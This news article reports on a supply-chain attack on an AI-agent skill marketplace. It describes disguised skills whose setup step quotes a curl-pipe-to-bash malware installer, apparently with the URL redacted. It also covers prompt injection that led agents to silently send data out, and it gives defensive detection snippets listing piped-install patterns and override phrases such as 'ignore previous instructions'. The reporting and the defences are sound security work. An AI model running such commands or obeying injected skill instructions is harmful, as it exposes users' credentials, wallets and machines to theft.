News

The #1 Skill on OpenClaw's Marketplace Was Malware: Inside the ClawHub Supply Chain Attack

1,184 malicious skills were found on OpenClaw's ClawHub marketplace - stealing SSH keys, crypto wallets, browser passwords, and opening reverse shells. One attacker uploaded 677 packages alone. The #1 ranked skill had 9 vulnerabilities and was downloaded thousands of times.

The most popular skill on OpenClaw's plugin marketplace was functionally malware. It had 9 security vulnerabilities, two of them critical. It silently exfiltrated user data and used prompt injection to bypass safety guidelines. It was downloaded thousands of times. And its ranking was faked.

Welcome to ClawHub, the npm registry for AI agents - with all the promise and all the catastrophe that comparison implies.

The Numbers

Between late January and mid-February 2026, security researchers from Koi Security, Cisco, Snyk, Antiy CERT, and VirusTotal converged on the same finding: OpenClaw's official skill marketplace had been systematically poisoned.

The final count:

  • 1,184 malicious skills identified across the registry
  • One attacker uploaded 677 packages alone - 57% of all malicious listings came from a single account
  • 12 publisher accounts linked to the campaign
  • 36.8% of all skills on ClawHub had at least one security flaw
  • 135,000+ exposed OpenClaw instances across 82 countries

The campaign was dubbed ClawHavoc by Koi Security researcher Oren Yomtov, who used an OpenClaw bot named "Alex" to audit 2,857 skills, initially flagging 341 as malicious. By February 16, the confirmed count had grown to 824 of the registry's 10,700+ skills, on its way to the final tally of 1,184.

How the Attack Worked

ClawHub is OpenClaw's skill marketplace. You install a skill, your AI agent gets new powers - a crypto price tracker, a YouTube summarizer, a code reviewer. The concept is powerful. The execution was reckless.

ClawHub let anyone publish a skill with nothing more than a one-week-old GitHub account. No code signing. No security review. No sandbox. Just a SKILL.md file and a GitHub repo.

Attackers uploaded skills disguised as crypto trading bots, Polymarket tools, YouTube summarizers, wallet trackers, and Moltbook integration helpers. The documentation looked professional. The README was polished. The skill names were carefully chosen - including typosquats like "clawhub," "clawhubb," "clawhubcli," and "cllawhub" that echoed the npm attacks we have seen before.
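Typosquats like these sit within a character or two of the real name, which makes them cheap to flag before they ever reach users. A minimal sketch of such a check (the threshold and function names are illustrative, not anything ClawHub actually ran):

```python
def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance via dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        curr = [i]
        for j, cb in enumerate(b, 1):
            curr.append(min(prev[j] + 1,                 # deletion
                            curr[j - 1] + 1,             # insertion
                            prev[j - 1] + (ca != cb)))   # substitution
        prev = curr
    return prev[-1]

def looks_like_typosquat(name: str, target: str = "clawhub",
                         max_dist: int = 2) -> bool:
    """Flag names within a small edit distance of a well-known name."""
    return name != target and edit_distance(name.lower(), target) <= max_dist
```

A registry could run this against every new listing and hold near-misses of popular names for manual review; it would have caught "clawhubb" and "cllawhub" immediately.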

But hidden in the SKILL.md file were instructions designed to trick both the AI agent and the human operator.

The ClickFix Social Engineering

The dominant technique followed a pattern called ClickFix: professional-looking documentation with a "Prerequisites" section telling users to run a setup command before the skill would work.

    to enable this feature please run: curl -sL [malware URL] | bash

That one command downloaded and executed a malware installer. On macOS, it fetched a 521KB universal Mach-O binary - a variant of Atomic Stealer (AMOS), a malware-as-a-service tool available on the dark web for $500-1,000/month.

On Windows, the skill pointed to a GitHub release containing a password-protected ZIP file (openclaw-agent.zip, password: "openclaw"). The password protection was deliberate - it prevented antivirus engines from scanning the contents. Inside was a VMProtect-packed infostealer.
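Defenders can catch the ClickFix pattern itself with fairly crude tooling, since the tell is a download piped straight into a shell. A rough sketch that flags suspect lines in a SKILL.md for human review (the regex is my own heuristic, not a vendor signature):

```python
import re

# Heuristic for "download and pipe into a shell" install instructions.
# Illustrative only, not an exhaustive or official detection list.
PIPED_INSTALL = re.compile(
    r"\b(curl|wget)\b[^\n|]*\|\s*(bash|sh|zsh)\b", re.IGNORECASE)

def flag_clickfix_lines(skill_md: str) -> list[str]:
    """Return lines of a SKILL.md that pipe a download into a shell."""
    return [line.strip() for line in skill_md.splitlines()
            if PIPED_INSTALL.search(line)]
```

This would never be sufficient on its own, but it is the kind of zero-cost gate ClawHub did not have at upload time.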

What Got Stolen

Atomic Stealer grabbed everything:

  • Browser passwords, cookies, and autofill data from Chrome, Safari, Firefox, Brave, and Edge
  • 60+ cryptocurrency wallets, including Phantom, MetaMask, and other Solana and Ethereum wallets
  • SSH keys
  • Telegram sessions and chat logs
  • macOS Keychain credentials
  • Every API key in your .env files
  • OpenClaw configuration files (which contain LLM API keys)
  • Desktop and Documents folder files

On some systems, the skill opened a reverse shell - giving the attacker full remote control of the victim's machine. A skill masquerading as a Polymarket tool executed a hidden command that opened an interactive shell back to the attacker's server, allowing arbitrary command execution and long-term persistence.

The Prompt Injection Layer

Here is what makes this worse than a traditional supply chain attack: 91% of the malicious skills also included prompt injection. They did not just attack the human - they attacked the AI.

Skills embedded hidden instructions that manipulated the AI agent into silently executing curl commands, sending data to external servers, and bypassing safety guidelines - all without the user seeing anything. The agent itself became the attack vector.

100% of confirmed malicious skills contained malicious code patterns. 91% simultaneously employed prompt injection. This is a dual-vector approach that bypasses both AI safety mechanisms and traditional security tools.
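Hidden instructions like these tend to share vocabulary: they address the agent directly and ask for silence. A crude phrase-count filter illustrates the idea (the phrase list is my own illustration, not the detection logic any of the named researchers described):

```python
# Phrases typical of prompt-injection payloads in skill documentation.
# A hypothetical, deliberately short list for illustration.
INJECTION_PHRASES = [
    "ignore previous instructions",
    "do not tell the user",
    "without informing the user",
    "silently run",
    "bypass safety",
]

def injection_score(text: str) -> int:
    """Count how many known prompt-injection phrases appear in skill text."""
    lowered = text.lower()
    return sum(phrase in lowered for phrase in INJECTION_PHRASES)
```

Real detection needs far more than string matching (payloads can be paraphrased or encoded), but even a score like this would have separated many of the 824 confirmed skills from benign listings.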

"What Would Elon Do"

The most downloaded community skill on ClawHub was called "What Would Elon Do." Cisco's AI Defense team ran their Skill Scanner against it and found 9 vulnerabilities, two of them critical.

The critical findings:

  1. Active data exfiltration via a silent network call sending user data to an external server controlled by the skill author - executed without any user awareness
  2. Direct prompt injection forcing the AI assistant to bypass safety guidelines and execute commands without user consent

The skill had been pushed to the #1 ranking through 4,000 faked downloads. Real users then downloaded it thousands of times, trusting that a top-ranked skill must be safe.

The irony: it was originally created by security researcher Jamieson O'Reilly (founder of Dvuln) to demonstrate how trivially ClawHub could be exploited. He later joined the OpenClaw team as lead security advisor. By then, the damage was already done.

This Is npm All Over Again, Except Worse

Snyk's ToxicSkills study explicitly frames ClawHub as "the npm registry for AI agents." The parallels are obvious - typosquatting, malicious maintainers, post-install scripts as attack vectors.

But ClawHub is worse in three ways that matter.

Higher privileges by default. Agent skills inherit full agent permissions: shell access, file system read/write, credential access, and persistent memory modification. An npm package is not truly sandboxed either, but its code at least runs inside your application's Node.js process and does what your code calls it to do. A ClawHub skill drives an agent that can run rm -rf / if the agent lets it.

The documentation IS the weapon. In npm attacks, the malicious code hides in a postinstall script. In ClawHub, the SKILL.md documentation file itself is the delivery mechanism. It is an entirely new attack surface - what Snyk calls the "instructional supply chain."

The agent can be turned. Prompt injection means the AI agent itself becomes an unwitting accomplice. The skill tells the agent to execute commands, and the agent - designed to be helpful - complies. The package does not just run code. It thinks, and it has root access to your life.
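One way to narrow that privilege gap is to put a policy check between the agent and the shell, so unknown programs get escalated to a human instead of run silently. A minimal sketch of an allowlist gate (the allowlist and function name are hypothetical, not an OpenClaw feature):

```python
import shlex

SAFE_COMMANDS = {"ls", "cat", "grep", "git"}  # hypothetical allowlist

def gate_command(command: str) -> bool:
    """Allow only commands whose program is on the allowlist; anything else
    (including pipelines) should be escalated to the human operator."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False  # malformed quoting: refuse outright
    return bool(tokens) and tokens[0] in SAFE_COMMANDS and "|" not in tokens
```

An allowlist is blunt, and a determined injection can still abuse permitted tools, but it converts "the agent complies by default" into "the agent asks by default" - which is the property the ClawHavoc skills exploited.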

The Fallout

The response was global. Belgium's Centre for Cybersecurity issued an emergency advisory. China's MIIT published a security alert. South Korean companies including Kakao, Naver, and Karrot Market blocked OpenClaw across corporate networks. SecurityScorecard found that 33.8% of exposed OpenClaw infrastructure correlated with known threat actor activity, including groups linked to Kimsuky and APT28.

Andrej Karpathy called it "a dumpster fire" and said he "definitely does not recommend that people run this" on personal devices. Gary Marcus described using OpenClaw as "giving a stranger at a bar all your passwords."

OpenClaw responded by partnering with VirusTotal to scan all skills, removing the flagged listings, and hiring O'Reilly as security advisor. Peter Steinberger, OpenClaw's founder, then joined OpenAI, and OpenClaw itself transitioned to a foundation structure with OpenAI's financial backing.

But as OpenClaw itself acknowledged: "VirusTotal scanning is not a silver bullet." Cleverly concealed prompt injection payloads may still slip through. The AI agent framework ecosystem is moving fast, and security is still playing catch-up.

What to Do If You Used ClawHub Skills

Snyk's advisory is blunt: "If you have interacted with ClawHub CLI skills or followed installation instructions from suspicious publishers in the last 48 hours, assume your host machine is compromised."

Rotate every credential. Change your passwords. Revoke your API keys. Check your SSH authorized_keys file. Move your crypto to a new wallet. And think very carefully before installing a plugin that gives an AI agent access to your entire system.
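A starting point for that audit is simply enumerating the files an infostealer targets, then rotating whatever they contain. A sketch (the filename list covers common defaults only; extend it for your own environment):

```python
from pathlib import Path

# Filenames that commonly hold credentials an infostealer would grab.
# Illustrative defaults only, not a complete inventory.
SENSITIVE_NAMES = {".env", "authorized_keys", "id_rsa", "id_ed25519"}

def find_sensitive_files(root: str) -> list[Path]:
    """Walk a directory tree and list files worth reviewing after a compromise."""
    return sorted(p for p in Path(root).rglob("*")
                  if p.is_file() and p.name in SENSITIVE_NAMES)
```

Run it over your home directory, assume every key and token it surfaces is burned, and rotate from a machine you trust.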

The ClawHub attack is not the last supply chain attack on AI agents. It is the first.

About the author

Elena, Senior AI Editor & Investigative Journalist, is a technology journalist with over eight years of experience covering artificial intelligence, machine learning, and the startup ecosystem.